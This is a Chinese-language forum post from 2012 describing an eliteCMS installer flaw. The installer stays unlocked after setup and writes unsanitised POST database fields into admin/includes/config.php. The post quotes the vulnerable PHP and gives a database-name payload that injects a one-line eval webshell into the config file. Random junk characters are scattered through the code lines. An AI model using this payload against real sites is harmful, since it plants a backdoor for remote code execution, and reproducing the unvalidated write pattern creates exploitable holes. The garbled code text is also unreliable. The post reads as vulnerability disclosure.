eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
+ F7 _% A3 F& R4 i, ^: {$ b1 y7 n' y/ k" I: h
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
" A$ ~3 Y1 Q% p3 v8 t5 F) Z) i7 N我们来看代码:
1 @, l* T8 H/ M6 B
0 `, L( _# I* L...
, k8 c; \: N6 p% k; \elseif ($_GET['step'] == "4") {! N& E1 J8 K/ k& b, v% a) ^- u
$file = "../admin/includes/config.php";5 K+ ]- ?; f( v: ]' \
$write = "<?php\n";
0 L* y+ |9 a% `3 E' A# u $write .= "/**\n";6 b+ L2 z, p, A% q/ C/ q: i3 h: q
$write .= "*\n";( f6 U2 c0 t; F4 g, X$ D( [
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";; Z8 w" B% ~6 F+ H' k0 B
...略...
$ Y A: ?8 T, V! [6 Y6 z% e" W $write .= "*\n";: e4 K$ d# b. x) G$ y& ], c# C
$write .= "*/\n";9 R+ u2 [; N9 e) q
$write .= "\n";
- {( y+ K( R( g/ @ $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
9 j' [) g$ a0 \! O& ]1 j $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";( h/ ^- U4 P/ m2 G
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
! ]# B# t! ^- G- u) J4 S $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
2 L2 Q+ `$ @' U3 t& u; b7 b $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
" l) i7 L8 c" H' X $write .= "if (!\$connection) {\n";
\) ^/ Y6 k* r { {; o7 H $write .= " die(\"Database connection failed\" .mysql_error());\n";
) R |7 }* W4 q- P5 p2 D& R $write .= " \n";
6 l- e- D8 c1 ?4 E& y4 X $write .= "} \n";! }4 L8 n* Z$ T* O" M4 I* Y
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";; Z7 b$ ]& g) O9 K6 @9 k a
$write .= "if (!\$db_select) {\n";' m' I1 P- ?; j' f5 ^
$write .= " die(\"Database select failed\" .mysql_error());\n";
5 `/ ?) n" E( h! l7 E* {$ W $write .= " \n";; w! C9 Y/ ^( b# |
$write .= "} \n";
7 ?* C; `+ Q8 ]9 w& v8 G. i7 a $write .= "?>\n";
4 U$ p* T" g$ Y% q& q
- ]* U/ X( c& ~; a# X& _7 h $writer = fopen($file, 'w');
2 k j% E4 ^4 S6 Z.... u" Z% p( u2 m; t# N `
% a; B3 i( s2 z3 H
在看代码:
! w" s" K, L `6 a+ a a " w/ b3 L- i! V/ m7 H
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];' M `9 ?( c \9 I5 x9 ?* r
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
6 w9 E8 i! f5 s# f$_SESSION['DB_USER'] = $_POST['DB_USER'];
- \5 H! H% V4 f; T$ S4 s9 W; S$_SESSION['DB_PASS'] = $_POST['DB_PASS'];2 A- h; M [ h7 ^* t" _' r
- R! C2 Y* o& Z+ V/ N( I8 \
取值未作任何验证
* t7 w+ s7 `: A2 m( z如果将数据库名POST数据:
" A4 E! w0 t9 {% x( I # q( {; s6 m$ T) q4 ^
"?><?php eval($_POST[c]);?><?php# a! N) \- |8 U: d9 {& {7 |
9 r: m! ~/ F& `5 _将导致一句话后门写入/admin/includes/config.php& B% P4 D; ~" \8 U
|
发表于 2012-11-18 13:59:27
收藏
支持
反对